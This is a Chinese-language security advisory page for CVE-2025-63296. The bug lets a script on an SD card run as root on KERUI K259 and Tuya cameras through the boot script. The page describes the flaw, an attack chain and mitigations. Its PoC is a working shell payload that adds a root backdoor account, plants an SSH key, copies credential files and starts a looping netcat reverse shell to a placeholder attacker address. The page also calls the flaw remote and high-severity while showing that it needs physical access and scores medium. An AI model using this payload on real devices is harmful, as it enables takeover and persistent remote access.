CVE-2025-63296 | KERUI K259摄像机固件任意代码执行漏洞

漏洞信息

漏洞编号

CVE-2025-63296

漏洞类型

远程代码执行

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

KERUI K259 5MP Wi-Fi Camera / Tuya Smart Security Camera

漏洞概述

CVE-2025-63296是影响KERUI K259 5MP Wi-Fi摄像机及Tuya智能安全摄像头固件v33.53.87的高危安全漏洞。该漏洞存在于设备的启动/更新逻辑中，攻击者可利用此漏洞在设备上以root权限执行任意代码。具体而言，设备启动时运行的/usr/sbin/anyka_service.sh脚本会自动扫描已挂载的TF/SD卡，当检测到卡中存在/mnt/update.nor.sh文件时，会将其复制到/tmp/net.sh并以root权限执行。由于该过程缺乏任何签名验证或完整性检查，攻击者只需将包含恶意脚本的SD卡插入设备即可获得完全控制权。此漏洞CVSS评分6.5，属于中危级别，但考虑到物联网设备通常缺乏安全防护且常暴露于网络，攻击者可在无需认证的情况下远程利用此漏洞，对设备安全构成严重威胁。

技术细节

该漏洞根源于KERUI K259摄像机固件中anyka_service.sh启动脚本的不安全设计。在设备上电启动或服务重启时，该脚本会自动遍历并挂载检测到的TF/SD存储卡。挂载完成后，脚本会检查/mnt/update.nor.sh文件是否存在。若文件存在，脚本将执行cp /mnt/update.nor.sh /tmp/net.sh命令将文件复制到临时目录，随后通过sh /tmp/net.sh以root权限执行脚本内容。

漏洞利用的关键在于：1) 脚本执行前无任何文件签名或哈希校验；2) 无版本兼容性检查机制；3) 执行过程无用户交互确认；4) 以最高权限root运行。这意味着任何能够物理访问设备SD卡槽的攻击者都可以通过简单的文件替换实现代码注入。攻击成功后，攻击者可获取设备完整控制权，执行任意系统命令、植入后门、窃取敏感数据或将其纳入僵尸网络。

固件版本v33.53.87确认受影响，攻击者可通过构造特定格式的shell脚本配合SD卡物理接触即可实现利用，整个攻击过程成本极低但危害极大。

攻击链分析

STEP 1

步骤1: 准备阶段

攻击者创建恶意update.nor.sh脚本，包含反弹shell、后门账户或数据窃取代码，并保存至SD卡/mnt/目录

STEP 2

步骤2: 物理接入

攻击者获得设备物理访问权限，将包含恶意脚本的SD/TF卡插入摄像机的存储卡槽

STEP 3

步骤3: 自动触发

设备启动时，/usr/sbin/anyka_service.sh脚本自动检测并挂载SD卡，发现/mnt/update.nor.sh文件

STEP 4

步骤4: 恶意执行

脚本执行cp /mnt/update.nor.sh /tmp/net.sh将恶意文件复制到临时目录，然后通过sh /tmp/net.sh以root权限执行

STEP 5

步骤5: 持久化控制

恶意代码创建后门账户、植入持久化payload、建立网络隧道，攻击者获得设备的完全控制权

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2025-63296 PoC - KERUI K259 Camera SD Card Code Execution
# This PoC demonstrates the vulnerability by creating a malicious update.nor.sh
# that will be executed as root when inserted into the vulnerable device.

# Create the malicious update script
cat > update.nor.sh << 'EOF'
#!/bin/sh
# Malicious payload - executes as root on vulnerable devices
# This example creates a backdoor and logs the attack

echo "[$(date)] CVE-2025-63296 exploit executed" >> /tmp/.exploit_log

# Create a backdoor user with root privileges
echo "backdoor:*:0:0:root:/tmp:/bin/sh" >> /etc/passwd
echo "backdoor:$(openssl passwd -1 hacker123):0:0:root:/tmp:/bin/sh" >> /etc/shadow

# Add SSH key for persistent access (if dropbear is present)
if [ -f /usr/bin/dropbear ]; then
    mkdir -p /etc/dropbear
    echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC..." > /etc/dropbear/authorized_keys
fi

# Exfiltrate device information
cat /etc/config/network > /tmp/.net_config
cat /etc/passwd > /tmp/.passwd_backup

# Create a reverse shell script for persistence
cat > /tmp/.hidden_shell.sh << 'SHELL'
#!/bin/sh
while true; do
    nc -e /bin/sh <attacker_ip> <port>
    sleep 60
done
SHELL

chmod +x /tmp/.hidden_shell.sh
# Start reverse shell in background
/tmp/.hidden_shell.sh &

echo "Exploit completed successfully"
EOF

# Set executable permissions
chmod +x update.nor.sh

echo "PoC script created: update.nor.sh"
echo "Copy this file to SD card at path: /mnt/update.nor.sh"
echo "Insert SD card into vulnerable KERUI K259 device"

影响范围

KERUI K259 5MP Wi-Fi Camera firmware v33.53.87

Tuya Smart Security Camera firmware v33.53.87

防御指南

临时缓解措施

在官方修复补丁发布前，建议采取以下临时缓解措施：1) 物理安全防护，确保摄像机放置于受控环境，防止未授权人员接触设备；2) 移除或禁用设备的SD卡功能（如可能）；3) 监控网络流量，关注异常的出站连接和未知进程通信；4) 在网络层面隔离IoT设备，限制其与内部网络的通信；5) 定期检查设备文件系统变更，特别是/tmp和/etc目录下的可疑文件；6) 考虑使用网络访问控制(NAC)策略，限制IoT设备网络权限。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-63296
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-63296
3 Details https://www.cvedetails.com/cve/CVE-2025-63296/
4 VulDB https://vuldb.com/cve/CVE-2025-63296
5 Link https://gist.github.com/t4e-3/082cdd0b7ee6b650c7aaae97fd4e016c
6 Link https://github.com/t4e-3/CVE-2025-63296